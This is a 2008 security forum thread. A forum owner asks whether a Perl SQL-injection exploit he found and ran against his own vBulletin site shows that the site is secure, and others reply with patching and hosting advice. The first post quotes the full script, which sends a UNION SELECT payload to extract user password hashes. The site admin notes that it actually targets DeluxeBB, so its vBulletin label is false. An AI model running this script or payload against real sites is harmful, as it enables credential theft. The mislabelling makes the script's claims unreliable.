 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 73
 Members: 0
 Total: 73
|
|
|
|
|
|
Full disclosure |
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
Is my forum secure ? |
|
 Posted: Tue Feb 26, 2008 6:59 pm |
 |
|
| F4r4Zm0In |
| Active user |
 |
|
| Joined: Feb 17, 2008 |
| Posts: 30 |
|
|
|
 |
|
 |
|
Hi,
i am very much afraid about my forums security because a few months back
it was hacked, and at that moment i was just "shocked!"
at that time i was running phpbb3
after that i changed it to vbulletin 3.6.5
i was just searching the google for vb exploits and found this one
| Quote: | #!/usr/bin/perl
use IO::Socket;
print q{
######################################################
# DeluxeBB Remote SQL Injection Exploit #
# vbulletin Remote SQL Injection Exploit #
# // SekoMirza // Turkish Hackerz #
######################################################
};
if (!$ARGV[2]) {
print q{
Usage: perl dbbxpl.pl host /directory/ victim_userid
perl dbbxpl.pl www.somesite.com /forum/ 1
};
}
$server = $ARGV[0];
$dir = $ARGV[1];
$user = $ARGV[2];
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];
print "-----------------------------------------------------------------------
-------------------------\r\n";
print "[>] SERVER: $server\r\n";
print "[>] DIR: $dir\r\n";
print "[>] USERID: $user\r\n";
print "-----------------------------------------------------------------------
-------------------------\r\n\r\n";
$server =~ s/(http:\/\/)//eg;
$path = $dir;
$path .=
"misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%
20WHERE%20(uid='".$user ;
print "[~] PREPARE TO CONNECT...\r\n";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED";
print "[+] CONNECTED\r\n";
print "[~] SENDING QUERY...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "[+] DONE!\r\n\r\n";
print "--[ REPORT ]-----------------------------------------------------------------------
-------------\r\n";
while ($answer = <$socket>)
{
if ($answer =~/(\w{32})/)
{
if ($1 ne 0) {
print "Password Hash is: ".$1."\r\n";
print "-----------------------------------------------------------------------
---------------\r\n";
}
exit();
}
}
print "-----------------------------------------------------------------------
-------------------------\r\n";
#########################################################
#Shoutz: #
# #
# My Sweet -> Caramel #
# For Mp3s -> Hypn0sis #
# For Support -> [WwW.StarHack.Org] #
# My Bro -> PhantomOrchid #
# My Preceptor -> Earnk Kazno #
######################################################### |
i run this exploit on my own forum to test its security and here is what i have got after running the perl coded exploit.
is this means that my forum is secure against this exploit [hope so] ? |
|
|
|
|
|
|
|
|
| Posted: Tue Feb 26, 2008 8:53 pm |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
Please pay attention to this piece of code in exploit "FROM%20deluxebb_users" ...
This exploit is fake, period! It will never work against VBulletin!
And if you patch your Vbulletin frequently, then probably your website is safe. Probably ... |
|
|
|
|
| Posted: Wed Feb 27, 2008 12:38 am |
|
|
| F4r4Zm0In |
| Active user |
|
|
| Joined: Feb 17, 2008 |
| Posts: 30 |
|
|
|
|
|
|
|
thanks for the quick response waraxe!
well the thing is - i am running a nulled version of vbulletin so where do i find patch for my vbulletin ver-3.6.5
any help will be highly appreciated
thanks  |
|
|
|
|
| Posted: Wed Feb 27, 2008 7:05 am |
|
|
| pexli |
| Valuable expert |
 |
|
| Joined: May 24, 2007 |
| Posts: 665 |
| Location: Bulgaria |
|
|
|
|
|
|
vbsupport.org
Where you host your forum?Recomend you lunarpages or godaddy. |
|
|
|
|
| Posted: Wed Feb 27, 2008 11:04 am |
|
|
| F4r4Zm0In |
| Active user |
|
|
| Joined: Feb 17, 2008 |
| Posts: 30 |
|
|
|
|
|
|
|
| koko wrote: | vbsupport.org
Where you host your forum?Recomend you lunarpages or godaddy. |
Vbsupport.org/eng.php is really usefull,
hopefully i will find a patch for my version
by the way i am hosting my forum on "byet.org"
what are the positive points about lunarpages or godaddy ?
just curious to know because, i never hosted on them.
Thanks! |
|
|
|
|
| Posted: Wed Feb 27, 2008 1:11 pm |
|
|
| pexli |
| Valuable expert |
|
|
| Joined: May 24, 2007 |
| Posts: 665 |
| Location: Bulgaria |
|
|
|
|
|
|
| Good security.Not 100% but good.I don't trust to free hostings.Sucksss. |
|
|
|
|
| Posted: Wed Feb 27, 2008 5:08 pm |
|
|
| F4r4Zm0In |
| Active user |
|
|
| Joined: Feb 17, 2008 |
| Posts: 30 |
|
|
|
|
|
|
|
| koko wrote: | | Good security.Not 100% but good.I don't trust to free hostings.Sucksss. |
well i dont have much knowledge about the level of security a paid host will provide but i am sure that their security is good enough as compared with a free host.
but if we are talking about vbulletin or phpbb3
what does a paid host do -
if someone is running a perl coded exploit on you forum, then you cant ask your paid host to support you!
because their answer will be something like:
upgrade to the latest version or just patch it!
By the way thanks for you suggestions! |
|
|
|
|
|
|
|
|
| Posted: Wed Feb 27, 2008 7:56 pm |
|
|
| pexli |
| Valuable expert |
|
|
| Joined: May 24, 2007 |
| Posts: 665 |
| Location: Bulgaria |
|
|
|
|
|
|
| F4r4Zm0In wrote: | | koko wrote: | | Good security.Not 100% but good.I don't trust to free hostings.Sucksss. |
well i dont have much knowledge about the level of security a paid host will provide but i am sure that their security is good enough as compared with a free host.
but if we are talking about vbulletin or phpbb3
what does a paid host do -
if someone is running a perl coded exploit on you forum, then you cant ask your paid host to support you!
because their answer will be something like:
upgrade to the latest version or just patch it!
By the way thanks for you suggestions! |
Well.Best option is colocated server and you build your own server with settings you want.In my practis i see paid servers with 0 security.For now best pay hosting is goddady and lunarpages.Everybody start with free hostings.Don't worry. |
|
|
|
|
|
|
|
|
| Posted: Fri Feb 29, 2008 7:28 am |
|
|
| F4r4Zm0In |
| Active user |
|
|
| Joined: Feb 17, 2008 |
| Posts: 30 |
|
|
|
|
|
|
|
| Quote: | | Well.Best option is colocated server and you build your own server with settings you want.In my practis i see paid servers with 0 security.For now best pay hosting is goddady and lunarpages.Everybody start with free hostings.Don't worry. |
I Think i will switch to paid hosting soon |
|
|
|
|
www.waraxe.us Forum Index -> General discussion
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
